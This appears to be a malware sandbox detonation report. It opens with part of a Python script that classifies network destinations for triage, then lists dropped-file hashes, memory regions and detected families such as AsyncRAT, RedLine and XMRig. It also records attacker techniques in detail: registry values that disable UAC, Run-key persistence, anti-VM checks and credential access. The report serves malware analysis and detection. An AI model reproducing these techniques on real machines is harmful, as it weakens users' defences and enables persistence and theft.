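    if domain.lower() in ('tcp', 'udp') and not proto:   # misaligned row
        domain, proto = '', domain
    ip, _, port = dest.rpartition(':')
    return {'country': country, 'ip': ip, 'port': int(port),
            'domain': domain or None, 'proto': proto.lower()}


def parse_rows(lines):
    return [parse_row(ln) for ln in lines
            if ln.strip().startswith('|') and not ln.lower().startswith('| country')]


def _is_ip(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def classify(rows, known_pools=()):
    """Return DNS lookups, a domain->IP map, and tagged (ip, port, proto) destinations."""
    dns_queries, resolved, dests = set(), defaultdict(set), {}
    for r in rows:
        if r['proto'] == 'udp' and r['port'] == 53:      # resolver traffic, not a connection
            if r['domain']:
                dns_queries.add(r['domain'])
            continue
        d = r['domain'] or ''
        if d and not _is_ip(d):                          # HTTP Host may be a bare IP
            resolved[d].add(r['ip'])
        tags = dests.setdefault((r['ip'], r['port'], r['proto']), set())
        if d.endswith(DDNS_SUFFIXES):
            tags.add('ddns')
        if d in IP_ECHO:
            tags.add('ip-echo')
        if d in known_pools:
            tags.add('mining-pool')
        if r['ip'] == '127.0.0.1':
            tags.add('loopback')
        elif r['port'] not in (80, 443):
            tags.add('non-standard-port')
    # The same high port on loopback and on a remote host usually means a local
    # listener (proxy/relay) the implant talks through; flag it for a closer look.
    loop_ports = {p for ip, p, _ in dests if ip == '127.0.0.1'}
    for (ip, p, _), tags in dests.items():
        if ip != '127.0.0.1' and p in loop_ports:
            tags.add('port-shared-with-loopback')
    return {'dns_queries': dns_queries, 'resolved': dict(resolved), 'destinations': dests}


def ddns_domains(result):
    """Dynamic-DNS names seen either in lookups or in connections."""
    names = result['dns_queries'] | set(result['resolved'])
    return {n for n in names if n.endswith(DDNS_SUFFIXES)}
```

Names such as t.me and files.000webhost.com get no tag: whether they are dead-drop resolvers or payload hosts depends on what was fetched, which this table does not record, so they are left for the analyst.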
Files
memory/1364-0-0x0000000074921000-0x0000000074922000-memory.dmp
memory/1364-1-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1364-2-0x0000000074920000-0x0000000074ECB000-memory.dmp
C:\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/3048-160-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1904-164-0x0000000000400000-0x00000000007C2000-memory.dmp
\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/1536-195-0x0000000000BD0000-0x0000000000C64000-memory.dmp
memory/2076-163-0x0000000000CA0000-0x0000000000CB2000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
memory/1028-158-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3048-156-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1796-135-0x0000000000220000-0x0000000000230000-memory.dmp
memory/1796-134-0x0000000000220000-0x0000000000230000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/1028-148-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2852-140-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2852-138-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1528-124-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1904-121-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/1904-120-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/1528-119-0x00000000058E0000-0x0000000005CA2000-memory.dmp
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/3032-98-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3032-97-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3032-95-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1364-83-0x0000000074920000-0x0000000074ECB000-memory.dmp
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/2972-40-0x0000000002490000-0x0000000002590000-memory.dmp
memory/2464-63-0x0000000000400000-0x000000000044F000-memory.dmp
memory/2464-61-0x0000000000400000-0x000000000044F000-memory.dmp
memory/2464-60-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2564-211-0x0000000005080000-0x000000000662A000-memory.dmp
memory/700-241-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/700-257-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\mediaget.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Local\Temp\HD_X.dat
| MD5 | 696a7236e14e7407b5023681fba1d690 |
| SHA1 | 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e |
| SHA256 | af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a |
| SHA512 | 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0 |
memory/2096-237-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-233-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-229-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-226-0x0000000005FC0000-0x0000000006382000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/2096-223-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-220-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-218-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2564-210-0x0000000005080000-0x000000000662A000-memory.dmp
memory/2096-240-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/1536-288-0x00000000002C0000-0x00000000002CC000-memory.dmp
memory/1536-291-0x00000000002D0000-0x00000000002DC000-memory.dmp
memory/1536-290-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/1536-289-0x00000000002E0000-0x00000000002EA000-memory.dmp
memory/700-209-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2096-214-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/2232-53-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
memory/1528-13-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1528-12-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/2464-316-0x0000000000400000-0x000000000044F000-memory.dmp
memory/3048-320-0x0000000000400000-0x0000000000434000-memory.dmp
memory/1028-319-0x0000000000400000-0x0000000000491000-memory.dmp
memory/2852-318-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2852-323-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2852-322-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1792-327-0x0000000000AE0000-0x0000000000B74000-memory.dmp
memory/2564-328-0x0000000005080000-0x000000000662A000-memory.dmp
memory/2096-329-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1528-354-0x0000000001AA0000-0x0000000002020000-memory.dmp
memory/2904-355-0x000000013F3C0000-0x000000013F940000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\259457134.bat
| MD5 | 3880eeb1c736d853eb13b44898b718ab |
| SHA1 | 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6 |
| SHA256 | 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7 |
| SHA512 | 3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b |
memory/2904-397-0x000000013F3C0000-0x000000013F940000-memory.dmp
memory/1528-396-0x0000000001AA0000-0x0000000002020000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 19:14
Reported
2024-12-04 19:18
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
219s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| File created | C:\Windows\system32\drivers\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\240629765.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37 | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| N/A | N/A | C:\Windows\Help\Winlogon.exe | N/A |
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 185.228.168.9 | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Internet Explorer\\fr-FR\\SearchApp.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\Resources\\Ease of Access Themes\\schtasks.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Default User\\winlogon.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Monitor = "C:\\Program Files (x86)\\SCSI Monitor\\scsimon.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
